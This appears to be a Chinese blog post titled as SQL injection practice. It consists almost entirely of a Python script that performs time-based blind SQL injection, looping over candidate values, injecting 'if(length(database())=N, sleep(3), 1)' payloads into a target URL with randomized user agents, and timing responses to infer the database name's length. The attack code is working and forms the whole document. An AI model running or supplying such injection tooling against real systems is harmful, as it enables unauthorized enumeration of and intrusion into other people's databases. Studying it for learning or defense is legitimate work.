# -*- coding: utf-8 -*-
"""
@Time : 2022/4/4 16:19
@Auth : zhangxiang
@File :GetLength_Inject.py
@IDE :PyCharm
@Motto:ABC(Always Be Coding)
"""
#获取数据库名长度
from urllib import request
from urllib import parse
import re
import time
import sys
import random
from ua_info import ua_list
class GetLength_Inject(object):
def __init__(self):
pass
def Str_Start(self,StrList,url):
for num in range(1,32):
judgeStr = "%20and%20if((length((select%20database()))=changeNum),sleep(3),1)%23"
submitStr = "&submit=0x5375626D6974%23"
pattern1 = r"changeNum"
replace1 = str(num)
FisWord = re.sub(pattern1,replace1,judgeStr)
full_url = url + FisWord + submitStr
print(full_url)
headers = {'User-Agent':random.choice(ua_list)}
startTime = time.time()
req = request.Request(url=full_url,headers=headers)
res = request.urlopen(req)
endTime = time.time()
allTime = endTime - startTime
# print(allTime)
if(allTime>3):
print("*"*200)
#StrList.append(num)
print("得到盲注结果,数据库的长度为:"+str(num))
print("注入的payload:"+full_url)
print("使用的时间:"+str(allTime))
print("*"*200)
# print(StrList)
# if (StrList[num] == None):
# return 0
return num
else:
pass
def Num_Start(self,StrList,url):
for num in range(1,32):
judgeStr = "%20and%20if((length((select%20database()))=changeNum),sleep(3),1)"
submitStr = "&submit=0x5375626D6974"
pattern1 = r"changeNum"
replace1 = str(num)
FisWord = re.sub(pattern1,replace1,judgeStr)
full_url = url + FisWord + submitStr
# print(full_url)
headers = {'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0) Gecko/20100101 Firefox/6.0'}
startTime = time.time()
req = request.Request(url=full_url,headers=headers)
res = request.urlopen(req)
endTime = time.time()
allTime = endTime - startTime
# print(allTime)
if(allTime>3):
print("*"*200)
# StrList.append(num)
print("得到盲注结果,数据库的长度为:"+str(num))
print("注入的payload:"+full_url)
print("使用的时间:"+str(allTime))
print("*"*200)
# print(StrList)
# if (StrList[num] == None):
# return 0
return num
else:
pass
SQL注入代码实践(盲注-获取数据库名长度【数值型】)
于 2022-08-20 18:41:56 首次发布